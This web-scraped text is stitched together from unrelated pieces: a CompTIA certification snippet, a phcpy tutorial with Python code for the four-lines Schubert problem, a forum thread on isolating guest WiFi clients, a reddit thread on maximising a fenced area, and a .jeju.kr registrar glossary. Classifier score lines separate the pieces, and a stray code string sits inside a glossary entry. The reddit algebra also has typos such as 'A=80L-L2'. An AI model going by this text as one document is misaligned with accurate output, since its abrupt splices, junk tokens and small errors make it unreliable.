if test "X$withval" = "X"; then
AC_LIB_WITH_FINAL_PREFIX([
eval additional_includedir=\"$includedir\"
eval additional_libdir=\"$libdir\"
])
else
additional_includedir="$withval/include"
additional_libdir="$withval/$acl_libdirstem"
fi
fi
])
if test $use_additional = yes; then
dnl Potentially add $additional_includedir to $CPPFLAGS.
dnl But don't add it
dnl 1. if it's the standard /usr/include,
dnl 2. if it's already present in $CPPFLAGS,
dnl 3. if it's /usr/local/include and we are using GCC on Linux,
dnl 4. if it doesn't exist as a directory.
if test "X$additional_includedir" != "X/usr/include"; then
haveit=
for x in $CPPFLAGS; do
AC_LIB_WITH_FINAL_PREFIX([eval x=\"$x\"])
if test "X$x" = "X-I$additional_includedir"; then
haveit=yes
break
fi
done
if test -z "$haveit"; then
if test "X$additional_includedir" = "X/usr/local/include"; then
if test -n "$GCC"; then
case $host_os in
linux* | gnu* | k*bsd*-gnu) haveit=yes;;
esac
fi
fi
if test -z "$haveit"; then
if test -d "$additional_includedir"; then
dnl Really add $additional_includedir to $CPPFLAGS.
CPPFLAGS="${CPPFLAGS}${CPPFLAGS:+ }-I$additional_includedir"
fi
fi
fi
fi
dnl Potentially add $additional_libdir to $LDFLAGS.
dnl But don't add it
dnl 1. if it's the standard /usr/lib,
dnl 2. if it's already present in $LDFLAGS,
dnl 3. if it's /usr/local/lib and we are using GCC on Linux,
dnl 4. if it doesn't exist as a directory.
if test "X$additional_libdir" != "X/usr/$acl_libdirstem"; then
haveit=
for x in $LDFLAGS; do
AC_LIB_WITH_FINAL_PREFIX([eval x=\"$x\"])
if test "X$x" = "X-L$additional_libdir"; then
haveit=yes
break
fi
done
if test -z "$haveit"; then
if test "X$additional_libdir" = "X/usr/local/$acl_libdirstem"; then
if test -n "$GCC"; then
case $host_os in
linux*) haveit=yes;;
esac
fi
fi
if test -z "$haveit"; then
if test -d "$additional_libdir"; then
dnl Really add $additional_libdir to $LDFLAGS.
LDFLAGS="${LDFLAGS}${LDFLAGS:+ }-L$additional_libdir"
fi
fi
fi
fi
fi
])
dnl AC_LIB_PREPARE_PREFIX creates variables acl_final_prefix,
dnl acl_final_exec_prefix, containing the values to which $prefix and
dnl $exec_prefix will expand at the end of the configure script.
AC_DEFUN([AC_LIB_PREPARE_PREFIX],
[
dnl Unfortunately, prefix and exec_prefix get only finally determined
dnl at the end of configure.
if test "X$prefix" = "XNONE"; then
acl_final_prefix="$ac_default_prefix"
else
acl_final_prefix="$prefix"
fi
if test "X$exec_prefix" = "XNONE"; then
acl_final_exec_prefix='${prefix}'
else
acl_final_exec_prefix="$exec_prefix"
fi
acl_save_prefix="$prefix"
prefix="$acl_final_prefix"
eval acl_final_exec_prefix=\"$acl_final_exec_prefix\"
prefix="$acl_save_prefix"
])
dnl AC_LIB_WITH_FINAL_PREFIX([statement]) evaluates statement, with the
dnl variables prefix and exec_prefix bound to the values they will have
dnl at the end of the configure script.
AC_DEFUN([AC_LIB_WITH_FINAL_PREFIX],
[
acl_save_prefix="$prefix"
prefix="$acl_final_prefix"
acl_save_exec_prefix="$exec_prefix"
exec_prefix="$acl_final_exec_prefix"
$1
exec_prefix="$acl_save_exec_prefix"
prefix="$acl_save_prefix"
])
dnl AC_LIB_PREPARE_MULTILIB creates a variable acl_libdirstem, containing
dnl the basename of the libdir, either "lib" or "lib64".
AC_DEFUN([AC_LIB_PREPARE_MULTILIB],
[
dnl There is no formal standard regarding lib and lib64. The current
dnl practice is that on a system supporting 32-bit and 64-bit instruction
dnl sets or ABIs, 64-bit libraries go under $prefix/lib64 and 32-bit
dnl libraries go under $prefix/lib. We determine the compiler's default
dnl mode by looking at the compiler's library search path. If at least
dnl of its elements ends in /lib64 or points to a directory whose absolute
dnl pathname ends in /lib64, we assume a 64-bit ABI. Otherwise we use the
dnl default, namely "lib".
acl_libdirstem=lib
searchpath=`(LC_ALL=C $CC -print-search-dirs) 2>/dev/null | sed -n -e 's,^libraries: ,,p' | sed -e 's,^=,,'`
if test -n "$searchpath"; then
acl_save_IFS="${IFS= }"; IFS=":"
for searchdir in $searchpath; do
if test -d "$searchdir"; then
case "$searchdir" in
*/lib64/ | */lib64 ) acl_libdirstem=lib64 ;;
*) searchdir=`cd "$searchdir" && pwd`
case "$searchdir" in
*/lib64 ) acl_libdirstem=lib64 ;;
esac ;;
esac
fi
done
IFS="$acl_save_IFS"
fi
])
|
__label__pos
| 0.513298 |
A apresentação está carregando. Por favor, espere
A apresentação está carregando. Por favor, espere
Biblioteca Allegro Monitoria de Introdução à computação – if669ec Thais Alves de Souza Melo - tasm 2011.2.
Apresentações semelhantes
Apresentação em tema: "Biblioteca Allegro Monitoria de Introdução à computação – if669ec Thais Alves de Souza Melo - tasm 2011.2."— Transcrição da apresentação:
1 Biblioteca Allegro Monitoria de Introdução à computação – if669ec Thais Alves de Souza Melo - tasm
2 Instalação Code::Blocks do site da disciplina já o possui instalado Guia para instalação manual: Instalação facilitada:
3 Criação do Projeto
4 Hello World
5 Init( ) int allegro_init(); Inicializa o Allegro, devendo ser chamada antes de qualquer outra função da biblioteca. int install_timer(); int install_keyboard(); int install_mouse(); Funções que instalam, respectivamente, o temporizador, teclado e mouse. int install_sound(int digi_card, int midi_card, char *cfg_path); Não vem por padrão no init() ;. Ativa o som no Allegro. Digi_card e midi_card referem-se aos controladores de som digital e MIDI, respectivamente. Passá-los como DIGI_AUTODETECT e MIDI_AUTODETECT para que o allegro selecione o driver. O parâmetro cfg_path refere-se à compatibilidade com versões anteriores, e pode ser ignorado passando-se NULL.
6 Init( ) void set_color_depth(int depth); Determina a quantidade de bits a serem utilizados pelos gráficos (depth). Posem ser: 8 (256 cores) 15 (32768 cores) 16 (65536 cores) 24 (aproximadamente 32 milhões de cores) 32 (aproximadamente 4 bilhões de cores) int set_gfx_mode(int card, int w, int h, int v_w, int v_h); Inicializa o modo gráfico. Card representa o driver gráfico a ser utilizado (ex.: GFX_AUTODETECT, para que o Allegro detecte automaticamente a placa de video), w e h representam o tamanho horizontal e vertical em pixels da tela. v_w e v_h indicam a resolução de uma possível tela virtual.
7 Deinit( ) void allegro_exit(); Utilizada ao final do programa para finalizar o Allegro. Não precisa ser necessariamente chamada, pois allegro_init determina que ela seja chamada automaticamente quando o programa é encerrado.
8 Alguns Tipos Definidos BITMAP Tipo definido pelo Allegro para manipular facilmente bitmaps, que seriam matrizes de pixels, em que cada elemento indica uma cor. Declaração: BITMAP *nome ; O allegro define automaticamente um BITMAP screen, referente à tela. PALLETE Vetor de 256 posições em que cada uma representa um código de cor. Declaração: PALLETE nome ;
9 Alguns Tipos Definidos FONT Contém a descrição das fontes que podem ser utilizadas na tela Declaração: FONT *nome ; MIDI Declaração: MIDI *nome ; SAMPLE Declaração: SAMPLE *nome ; Os tipos FONT e PALLETE não serão utilizados.
10 Teclado O Allegro trabalha com um vetor key[] de 127 posições, cujos elementos representam as teclas. Para facilitar, são definidas constantes que facilitam a busca de um elemento no vetor: Exemplo: key[KEY_ESC] TeclaCódigo na ArrayTeclaCódigo na Array A, B... ZKEY_A, KEY_B...KEY_ZPauseKEY_PAUSE Teclado Numérico 0 a 9 KEY_0_PAD... KEY_9_PAD Barra de EspaçoKEY_SPACE Teclado Normal 0 a 9KEY_0... KEY_9Print ScreenKEY_PRTSCR EscKEY_ESCShitf EsquerdoKEY_LSHIFT EnterKEY_ENTERShift DireitoKEY_RSHIFT Seta para a DireitaKEY_RIGHTControl EsquerdoKEY_LCONTROL Seta para a EsquerdaKEY_LEFTControl DireitoKEY_RCONTROL Seta para CimaKEY_UPAlt esquerdoKEY_ALT Seta para BaixoKEY_DOWNAlt DireitoKEY_ALTGR
11 Exemplos while(!key[KEY_ESC]) {... } if(key[KEY_ENTER]) {... } Executará o código enquanto ESC Não estiver pressionado. Entrará no if apenas se ENTER estiver Pressionado
12 Texto void textout_ex(BITMAP *bmp, const FONT *f, const char *s, int x, int y, int color, int bg); Imprime uma string na tela na posição x, y. Color refere-se a cor do texto e bg a cor do fundo do texto. void textprintf_ex(BITMAP *bmp, const FONT *f, int x, int y, int color, int bg, const char *fmt,...); Imprime uma string na tela de forma parecida à printf(), permitindo a passagem de parâmetros como %d, %c etc.. int makecol(int r, int g, int b); Converte cores do formato RGB para o formato aceito pelas funções. Obs1.: 0 equivale a cor preta e -1 ou makecol(255, 0, 255) à transparente. Obs2.: Passar o parâmetro FONT como font (sem aspas) para utilizar a fonte própria do sistema. Obs3.: Ambas possuem variantes que imprimem o texto centralizado, justificado ou alinhado à direita.
13 Primitivas de Imagem int getpixel(BITMAP *bmp, int x, int y); Lê um o pixel da coordenada (x, y) de um BITMAP. int getr(int c); int getg(int c); int getb(int c); Retornam respectivamente os valores de R, G e B de um determinado pixel (pego pelo getpixel()). void putpixel(BITMAP *bmp, int x, int y, int color); void line(BITMAP *bmp, int x1, int y1, int x2, int y2, int color); void triangle(BITMAP *bmp, int x1, y1, x2, y2, x3, y3, int color); void rect(BITMAP *bmp, int x1, int y1, int x2, int y2, int color); void circle(BITMAP *bmp, int x, int y, int radius, int color);
14 Carregando imagens BITMAP *create_bitmap(int width, int height); Cria um bitmap de memória do tamanho especificado. BITMAP *load_bitmap(const char *filename, RGB *pal); Carrega um arquivo bitmap do disco. RGB* pal refere-se à paleta de cores, aplicada apenas a imagens de 8 bits. Passar como NULL. void destroy_bitmap (BITMAP *bitmap); Libera a memória utilizada por um bitmap. void clear_bitmap(BITMAP *bitmap); Limpa um bitmap para a cor preta. void clear_to_color(BITMAP *bitmap, int color); Análoga àcima, porém com a escolha da cor para a qual será limpo o bitmap. Obs.: Não é necessário utilizar a função create_bitmap antes da load_bitmap!
15 Blitting e Sprites void blit(BITMAP *source, BITMAP *dest, int source_x, int source_y, int dest_x, int dest_y, int width, int height); Copia uma área retangular (width x height) do bitmap de fonte (source) em um bitmap de destino (dest). Não aceita o rosa puro como transparante. void draw_sprite(BITMAP *bmp, BITMAP *sprite, int x, int y); Copia o bitmap de origem (sprite) diretamente no bitmap de destino (bmp). Aceita o rosa puro como transparente. Obs.: Ambas as funções acima possuem variantes que espelham, aumentam ou rotacionam as imagens.
16 Exemplo... BITMAP* buffer, *imagem ; buffer = create_bitmap(60, 60) ; imagem = load_bitmap(imagem.bmp, NULL) ;... blit(imagem, buffer, 100, 100, 0, 0, 60, 60) ; draw_sprite(screen, buffer, 400, 300) ;... destroy_bitmap(imagem) ; destroy_bitmap(buffer) ;... Podemos usar o clear_bitmap() aqui, caso ainda precisemos usar os BITMAPs.
17 Double Buffering Desenhar os bitmaps diretamente no screen faz e depois limpá-lo faz com que a tela pisque a cada troca de frame, gerando um efeito visualmente desconfortável. Para evitar esse problema, é utilizada a técnica de double buffering: Cria-se um BITMAP* buffer de memória, em geral do tamanho da tela e nele são desenhados todos os elementos desejados. O buffer é desenhado então na tela e é depois limpado, e assim sucessivamente para os outros frames. Não usar clear_bitmap na screen!
18 Exemplos Sem Double Buffering: int main(){ init(); while (!key[KEY_ESC]){ textout_centre_ex(screen, font, "Sem Double Buffering", 320, 240, makecol(255, 255, 255), 0); clear_bitmap(screen) ; } deinit(); return 0; } END_OF_MAIN() Com Double Buffering: int main(){ init(); BITMAP* buffer = create_bitmap(640, 480) ; while (!key[KEY_ESC]){ textout_centre_ex(buffer, font, "Com Double Buffering", 320, 240, makecol(255, 255, 255), 0); draw_sprite(screen, buffer, 0, 0) ; clear_bitmap(buffer) ; } deinit(); return 0; } END_OF_MAIN()
19 Som – MIDI MIDI *load_midi(const char *filename); Carrega um arquivo MIDI. void destroy_midi(MIDI *midi); Libera a memória do arquivo carregado. int play_midi(MIDI *midi, int loop); Toca o arquivo MIDI indicado, parando a execução de qualquer outro MIDI. Se loop receber qualquer valor diferente de 0, tocará até ser parado ou substituído. void stop_midi(); Pára qualquer MIDI que esteja sendo executada (funciona de maneira semelhante à play_midi(NULL, false) ;)
20 Som – Sample SAMPLE *load_sample(const char *filename); Carrega um SAMPLE. void destroy_sample(SAMPLE *spl); Libera a memória ocupada por um SAMPLE. int play_sample(const SAMPLE *spl, int vol, int pan, int freq, int loop); Toca um sample. Vol e pan variam de 0(min/esquerda) à 255(máx/direita). Freq indica a velocidade com que o som é executado, sendo 1000 a velocidade normal. Loop indica a quantidade de vezes para repetir um som. void stop_sample(const SAMPLE *spl); Pára a execução de um sample. Obs.: Diferente dos MIDI, podem ser executados vários SAMPLEs ao mesmo tempo.
21 Mouse O mouse em allegro se comporta como um objeto, possuindo as variáveis mouse_x e mouse_y que indicam sua posição. A variável mouse_b indica qual botão do mouse está sendo pressionado, sendo o bit 0 o botão esquerdo, o bit 1 o botão direito e o bit 2 o botão do meio. Sintática da comparação: If(mouse_b & 1) printf(Botao esquerdo apertado) ; If(!(mouse_b & 1)) printf(Botao esquerdo não apertado) ; Atenção: comparação bit a bit! (apenas um &) void position_mouse(int x, int y); Coloca o mouse na posição x e y indicada void show_mouse(BITMAP *bmp); Desenha o mouse no bitmap apontado. Para não exibir mouse, passar NULL como argumento. Obs.: Funciona apenas com o timer instalado
22 Temporizador A priori, para o controle da velocidade do jogo, temos a função void rest(unsigned int time); que faz com que o computador aguarde time milissegundos para executar o próximo comando. Porém, em computadores mais lentos, isso pode prejudicar o andamento do jogo, pois os comandos seriam executados mais lentamente, o que levaria a necessidade de um rest menor ou até sua ausência para que a velocidade se mantivesse. O uso de temporizadores resolve este problema.
23 Temporizador - Exemplo volatile long int contador = 0 ; void timer_game () ; … void timer_game () { contador++ ; } END_OF_FUNCTION(timer_game) ;... int main() {... LOCK_VARIABLE(contador) ; LOCK_FUNCTION(timer_game) ; install_int (timer_game, TBF) ;... } Variável global! TBF = Time Between Frames
24 Exercício Implementar um space invaders simplificado em Allegro. Deve possuir um menu com duas opções: Selecionando a primeira, deverá aparecer uma nave que se move na horizontal controlada pelo usuário. Ao pressionar ESPAÇO, a nave deve atirar um projétil (velocidade constante) na direção em que está olhando. Ao pressionar a tecla P, deve voltar ao menu inicial. A segunda opção é a de sair do programa.
25 Referências - Manual com funções das versões 4 e 5 do Allegro.
26 Tutoriais (Em Inglês) gro.html gro.html
Carregar ppt "Biblioteca Allegro Monitoria de Introdução à computação – if669ec Thais Alves de Souza Melo - tasm 2011.2."
Apresentações semelhantes
Anúncios Google
|
__label__pos
| 0.833938 |
College Algebra 7th Edition
Published by Brooks Cole
ISBN 10: 1305115546
ISBN 13: 978-1-30511-554-5
Chapter 2, Functions - Section 2.8 - One-to-One Functions and their Inverses - 2.8 Exercises - Page 263: 56
Answer
$f^{-1}(x) = \frac{2x}{x - 3}$
Work Step by Step
$f(x) = \frac{3x}{x - 2}$ $y = \frac{3x}{x - 2}$ y(x - 2) = 3x yx - 2y = 3x yx - 3x = 2y x(y - 3) = 2y $x = \frac{2y}{y - 3}$ $f^{-1}(x) = \frac{2x}{x - 3}$
Update this answer!
You can help us out by revising, improving and updating this answer.
Update this answer
After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
|
__label__pos
| 0.918378 |
Use PowerShell to Group and Format Output
Summary: Microsoft Scripting Guy, Ed Wilson, teaches how to use Windows PowerShell to group and to format output.
Microsoft Scripting Guy, Ed Wilson, is here. One of the cool things about Windows PowerShell is that it allows you to work the way that you like to do so. The other day, I was making a presentation to the Charlotte PowerShell Users Group. The photo that follows shows me talking, and the Scripting Wife and Microsoft PFE Jason Walker at this first ever meeting.
Photo
One of the attendees asked, “Is Windows PowerShell a developer technology or a network administrator type of technology?” Before I could even answer the question, someone else jumped in and said that Windows PowerShell is really powerful, and that it has a number of things that would appeal to developers. However, he continued, the main thing about Windows PowerShell is that it allows you to process large amounts of data very quickly. Cool, I thought to myself; I did not see the need to add anything else to the conversation.
One of the fundamental aspects of working with data is grouping the data to enable viewing relationships in a more meaningful way. Earlier this week, I looked at using the Group-Object cmdlet to group information.
The Group-Object cmdlet does a good job of grouping Windows PowerShell objects for display, but there are times when a simple grouping might be useful in a table. The problem is that the syntax is not exactly intuitive. For example, it would seem that the command that is shown here would work.
Get-Service | Format-Table name, status -GroupBy status
When the command runs, however, the output (shown in the following image) appears somewhat jumbled.
Image of command output
In fact, the first time I ran across this, the output confused me because it looks like it is grouping the output. The second time I ran across this grouping behavior, the output seriously disappointed me because I realized that it was not really grouping the output. Then it dawned on me, I need to sort the output prior to sending it to the Format-Table command. I therefore, modified the command to incorporate the Sort-Object cmdlet. The revised command is shown here.
Get-Service | Sort-Object status | Format-Table name, status -GroupBy status
After it is sorted by the Status property, the service information displays correctly in the grouped table. This revised output is shown in the image that follows.
Image of command output
As might be expected, this non-grouping behavior also exists with the Format-List cmdlet, which is a cmdlet that also contains the GroupBy parameter. The code that follows appears to group the output, until one takes a closer look at the output.
Get-Service | Format-List name, status -GroupBy status
A look at the output (shown in the following image) shows that the grouping occurs only when concurrent services share the same status.
Image of command output
The fix for the grouped output from the Format-List cmdlet is the same as the fix for the Format-Table cmdlet—first sort the output by using the Sort-Object cmdlet, then pipe the sorted service objects to the Format-List cmdlet for grouping. The revised code is shown here.
Get-Service | sort-object status | Format-List name, status -GroupBy status
The revised command and the associated sorted output from the command are shown in the image that follows.
Image of command output
One of the cool things to do with the Format-List cmdlet is to use a ScriptBlock in the GroupBy parameter. Once again, it is necessary to sort the output prior to sending it to the Format-List cmdlet. In fact, you may need to sort on more than one parameter, as illustrated in the code that follows. (This code is a single line command that is broken at the pipe character for readability).
Get-Service | sort-object status, canstop |
Format-List name, status –GroupBy {$_.status -eq ‘running’ -AND $_.canstop}
To make the output easier to assess, I added the Unique switched parameter to the Sort-Object cmdlet to shorten the output. Interestingly enough, the first condition reports two services for the first condition. This is because each -AND combination equals False.
Image of command output
Format-Table also accepts a ScriptBlock for the GroupBy parameter. It works the same way that the Format-List behaves. The code that follows creates two tables, one that evaluates to False, and one that evaluates to True.
Get-Service | sort-object status, canstop -unique |
Format-table name, canstop, status -GroupBy {$_.status -eq ‘running’ -AND $_.canstop}
The image that follows illustrates creating a table that groups output based on a ScriptBlock.
Image of command output
Well, that is about all there is to grouping output information by using the Format-Table and the Format-List cmdlets.
I invite you to follow me on Twitter and Facebook. If you have any questions, send email to me at [email protected], or post your questions on the Official Scripting Guys Forum. See you tomorrow. Until then, peace.
Ed Wilson, Microsoft Scripting Guy
Comments (5)
1. K_Schulte says:
Hi Ed,
again something for the daily work toolbox!
And again using script blocks increases the flexibility of "Goupby" a lot!
Klaus (Schulte)
2. jrv says:
Useful:
Fully sorted list:
Get-Service | sort-object status,name | Format-List name -GroupBy status
3. @thommck says:
This is just what I was looking for.
One more thing I would like, how would I add a total as a summary.
I'm trying to output a table showing all the computers in AD along with their OS. I then want it grouped by OS and give me a total value for each (e.g. 700xXP, 300xWin7). Is that possible?
4. Amed H says:
Hi,
I have been searching for a way to split an ordered set of columns across the screen and I found none. I hear Powershell is the thing now so I hope it can be done.
Here what I want
Key Value
—- ——-
C 1
A 2
D 3
I'd like the above to look like this instead
Key Value Key Value
—- ——- ——- ——-
C 1 D 3
A 2
Thank you.
5. David Eaton says:
Amed H,
Format-Wide will put the columns across the screen but can only be used with a single column
Skip to main content
|
__label__pos
| 0.656533 |
Take the 2-minute tour ×
Webmasters Stack Exchange is a question and answer site for pro webmasters. It's 100% free, no registration required.
In websites, most of the RSS feed icons are orange/red. For instance in Pro Webmasters also the RSS feed menu is orange i.e., in tag subscription. What's the reason for using like that?
Is there any procedure following along by the web developers to choose the color of the RSS feed menu?
share|improve this question
I think your making this more complicated than it is. RSS is associated with orange because that's the way it's always been. The rss icon is orange, and making the rss menu orange too helps people recognise it better. – Christofian Jul 21 '12 at 15:34
1
"menu" - do you mean icon? – w3d Jul 21 '12 at 15:37
@w3d Yes the rss icon, but what's the reason for down vote? – Vijin Paulraj Jul 21 '12 at 18:13
Not sure of the down vote. But I think the answer is simply convention. As with all conventions, however, they do have their origins and @deathlock's answer appears to cover that quite well. – w3d Jul 21 '12 at 19:23
add comment
1 Answer 1
I remember the icon was first used in Mozilla Firefox, and later adapted by Microsoft to be used in their Internet Explorer. Since then, it has became the web standard that the orange-colored icon symbolizes the RSS icon.
I don't think there's any specific reason to use the RSS icon in its orange color, as various designers (showcased through web design blogs) have made various alternatives in color and shape. However the orange color and rounded-square shape is easier to recognize as it has been used widely.
share|improve this answer
3
The Wikipedia article for RSS also includes a bit of history behind the icon and backs up what you have already said: "In Dec 2005, the Microsoft Internet Explorer team and Microsoft Outlook team announced on their blogs that they were adopting the feed icon first used in the Mozilla Firefox browser. In Feb 2006, Opera Software followed suit. This effectively made the orange square with white radio waves the industry standard for RSS and Atom feeds, replacing the large variety of icons and text that had been used previously to identify syndication data." – w3d Jul 21 '12 at 19:29
add comment
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.682735 |
在之前的文章我们介绍了一下 Java 类的重写及与重载的区别,本章我们来看一下 Java 类的 private,static,final。
我们在之前引入 Java 类概念的时候是通过商场收银台来引入的,如下:
如果我们使用刷卡的形式进行付账,我们需要出示一张有足够余额的银行卡或者会员卡来进行付款,在付款的时候我们仅仅是通过刷卡,输入密码来完成支付,在这个过程中,收银员是不能看到我们的卡号,密码,余额这些私密性的数据,否则可能会出现被盗刷或者其他问题,收银员在收银的时候只需要做的就是我们输入密码时对我们输入的密码与原始密码时候匹对和账户余额是否大于等于商品价格就可以了。
根据上面的分析我们我们可以定义一个 Card 类:
class Card{
private String cartId; // 卡号
private String cardPwd; // 密码
private double balance; // 余额
public boolean payMoney(double money){ // 支付
if(balance >= money){
balance -= money;
return true;
}
return false; }
public boolean checkPwd(String pwd){ // 检查密码
if(cardPwd.equals(pwd)){
return true;
}
return false;
}
}
在上面的代码中,我们将变量前的修饰词写成了 private,将方法前的修饰词写成了 public。接下来我们看一下 private 和 public 之间的区别。
private 修饰从成员变量和方法只能在本类中调用,public 修饰的成员变量和方法可以在任何地方调用。
private 修饰的内容是对内实现的封装,public 修饰的内容是对外提供可以被调用的功能。
另外还有两种:protected 和 默认不写,我们称之为访问控制修饰符,他们的控制范围分别是:
1)public:公开的,任何类
2)private:私有的,本类
3)protected:受保护的,本类、子类、同包类
4)默认的(什么也不写):本类、同包类
接下来我们看一下关键字 static 。
之前我们在类中定义的变量其实可以叫做实例变量,还有一种变量叫做静态变量,即用 static 关键字修饰。我们先来看一下两种变量之间的区别:
1、实例变量:
1)属于对象的,存在对重
2)有几个对象就有几份实例变量
3)必须通过 对象名. 来访问
2、静态变量:
1)属于类的,存在方法区中
2)只有一份
3)必须通过 类名. 来访问
我们通过下面的代码来实际看一下:
public class HelloWorld {
public static void main(String[] args) {
Aoo aoo1 = new Aoo();
aoo1.show(); // a=1 b=1 Aoo aoo2 = new Aoo();
aoo2.show(); // a=1 b=2
}
} class Aoo {
int a;
static int b; Aoo() {
a++;
b++;
} void show() {
System.out.println("a=" + a);
System.out.println("b=" + b);
}
}
在上面的代码中我们分别定义了实例变量a 和静态变量b,然后实例化了两次 Aoo,再通过两次调用实例化 Aoo 后调用 show() 方法可以看出我们实例化后调用的实例变量 a 的值不变,即每实例一次就会复制出一个 a,而静态变量 b 则每实例化一次后值会变化,即实例化后并不会重新复制一个 b,而是继续使用上一次的。
接下来我们看一下 static 关键字的静态方法。
静态方法和上面的静态变量大体上相同,但也有特殊的地方。
1)属于类的,存在方法区中
2)只有一份
3)必须通过 类名. 来访问
4)没有隐式的 this 传递,静态方法中不能直接访问实例变量
class Aoo {
int a; // 实例变量---对象点访问
static int b; // 静态变量---类名点访问 void test1() { // 实例方法
a++;
b++;
} static void test2() { // 静态方法
a++; // 编译错误
test1(); // 编译错误
b++;
}
}
在上面的代码中,我们通过 static 关键字将变量 b 变为静态变量,将 test2() 变为静态方法,当我们在 test1() 的实例方法中 a++ 和 b++ 时,系统会默认为我们写成 this.a++ 和 Aoo.b++;而在 test2() 中,由于静态方法没有隐式 this,所以 a++ 和 test1() 方法并没有。
接下来我们看一下 static 关键字的静态块。
public class HelloWorld {
public static void main(String[] args) {
Aoo aoo1 = new Aoo(); // 静态块 构造方法
Aoo aoo2 = new Aoo(); // 构造方法
}
} class Aoo {
static {
System.out.println("静态块");
} Aoo(){
System.out.println("构造方法");
}
}
在上面的代码中,我们在 Aoo 中创建了一个构造方法,并且通过 static { } 创建了一个静态块,我们实例化了两个 Aoo 类,我们发现静态块只加载一次,而静态方法每实例化一次就加载一次。
静态块在实际应用中可以加载图片,音频,视频等静态资源,比如我们逛淘宝时图片只加载一次,不可能每个人近义词淘宝网站就加载一次,服务器压力也受不了。
接下来我们来看一下 final 关键字。
1、final 修饰成员变量,两种方式初始化:
1)声明的同事初始化
2)构造方法中初始化
2、final 修饰局部变量,只要在用之前初始化即可。
代码如下:
class Aoo {
int a = 10;
int b;
final int c = 10; // 声明同时初始化
// final int d; // 编译错误 声明未初始化
final int e; Aoo() {
e = 10; // 构造方法中初始化
} void test() {
final int f; // 局部变量:用之前赋值即可,不用刻意不用赋值
a = 20;
// c = 20; // 编译错误,final 修饰变量不能被改变
} }
final 修饰方法:final 修饰方法不能被重写。
代码如下:
class Aoo {
void test(){}
final void show(){}
} class Boo extends Aoo{
void test(){}
void show(){} // 编译错误,final 方法不能被重写
}
final 修饰类:final 修饰的类不能被继承,但是能继承其他类
代码如下:
class Aoo {}
class Boo extends Aoo{}
final class Coo extends Aoo{} // final 修饰的类可以继承别的类 final class Doo{}
class Eoo extends Doo{} // 编译错误,final 修饰的类不能被继承
|
__label__pos
| 0.995909 |
Question: How Long Does It Take To Study For A+ Exam?
How long does it take to be it certified?
Certs that typically require about six months These certifications are either two or three exams.
Sticking with the assumption that it takes three months to study per exam, then these should be attainable in six months..
How difficult is the Network+ exam?
Overall CompTIA Network+ is less challenging . There are 3 simple comparisons to put the word “hard” in the right scale. Alphaprep.net can make the studding process much more fun and passing the exam much easier. If you have more questions or need more explanation just comment.
Is the A+ exam multiple choice?
The CompTIA A+ exams include a combination of multiple-choice questions, drag-and-drop activities and performance-based items. The multiple-choice questions are single and multiple response.
Should I take Network+ or Security+?
The CompTIA Security+ certification is a better choice than the CompTIA Network+ certification for most people looking to enter into the IT or cybersecurity fields because it validates a higher level of skill and knowledge, commands a higher salary, and offers more career options.
Which IT certifications should I get first?
10 entry-level IT certs to jump-start your careerCisco Certified Entry Networking Technician (CCENT)Cisco Certified Technician (CCT)Cisco Certified Network Associate (CCNA) Routing & Switching.CompTIA IT Fundamentals+ (ITF+)Comp TIA A+CompTIA Network+CompTIA Security+Microsoft Technology Associate (MTA)More items…•
Which is harder A+ or Network+?
Reason #2: Network+ is not more difficult than the A+. This is because the Network+ isn’t any more difficult that the A+, and in fact it may be easier than the A+ simply because of the tremendous amount of material on both A+ exams and the rote memorization much of the A+ material requires.
How can I pass a test without studying?
12 Study Hacks To Pass Exams Without StudyingKeep panic at bay: This is probably the most important thing to remember. … Find a work place you prefer: Find a suitable work place that is comfortable and be ready to spend your last minute jitters there.More items…•
What is the passing score for A+ certification?
Exam DetailsExam CodesCompTIA A+ 220-1001 (Core 1) and 220-1002 (Core 2) Candidates must complete both 1001 and 1002 to earn certification. Exams cannot be combined across the series.Length of Test90 Minutes per examPassing Score220-1001: 675 (on a scale of 100-900) 220-1002: 700 (on a scale of 100-900)9 more rows
How do you study for A+ exam?
Exam Study Tips for Passing the CompTIA A+ ExamsTip 1: Become familiar with the CompTIA A+ Exam Objectives. One of the first things you can do to prepare long before test day is to download the CompTIA Exam Objectives. … Tip 2: Become familiar with the inside of a computer. … Tip 3: Use additional study resources available on the Internet. … Tip 4: Take a few practice exams.
Do I need a+ before Network+?
Some students prefer to go through Network+ before the A+ certification exams. The CompTIA Network+training course material is a bit less dense, and focuses specifically on networking knowledge, while A+ covers a wide variety of topics. This makes Network+ easier for some students to complete.
Can I take the A+ Certification test online?
CompTIA understands the investment and effort you make in studying and training for your certification. In addition to taking an exam in person at a test center, CompTIA now offers online testing. Online testing allows you to: Test anywhere – especially from the security and privacy of your own home.
How long did you study for Network+?
After working with hundreds of test takers, they’ve found that 12 weeks or three months is the sweet spot for studying 30 minutes per day. With that said, Network+ is another entry-level certification….CompTIA Network+Less than a month37%214 – 8 weeks16%99 – 12 weeks14%8More than 3 months33%19N =574 more rows•Aug 20, 2018
Is the A+ exam hard?
The CCNA is a hard test because there’s not a lot you can do to get familiar with the equipment, but the A+ can be learned pretty easily from the CompTIA certmaster coursework or from a study guide. It’s the entry level exam for basically the entire IT industry.
Is CompTIA A+ worth it 2020?
Being CompTIA A+ certified is definitely worth it when it comes to landing entry-level jobs. … Having the A+ can help you land entry-level IT jobs like desktop support or help desk tech. The new CompTIA A+ is a good place to start. It provides the foundational knowledge for bigger and better roles further down the line.
How can I get my A+ certification for free?
You can, in a way, get it for “free” but in reality it is just through a local community college class that it is free. When I received my A+ certification, I was in college for an AS and one of the classes I took for the certification gave me a waiver for free to take the test just once, whether I pass or fail.
How much is the CompTIA A+ exam?
Although the cost of CompTIA A+ exams varies depending on country, the average price is $170. This translates to $340 for two exams required to become fully certified. The examinations you need to take and pass include 200-901 and 200-902.
DO YOU NEED A+ for Security+?
There is absolutely ZERO need to get A+ or Network+, prior to studying Security+. The morons above quoting the recommended order, are doing so for people who have no knowledge whatsoever of computers.
Can you self study for CompTIA A+?
Self-Study As I mentioned before, I self studied for the CompTIA A+ exams. It wasn’t easy, but it is very possible. If you have a bit of experience from IT work or are a computer enthusiast, and are comfortable with the topics listed above; you may want to self study for the exams.
Is a Network+ certification worth it?
Network+ is very helpful in getting you started with your IT career, but if you want to advance to the upper echelons in the field of IT networking, it is recommend that you also get intermediate and advanced level certifications like CCNA (Cisco Certified Network Associate), and CCNP (Cisco Certified Network …
Is CCNA Better Than Network+?
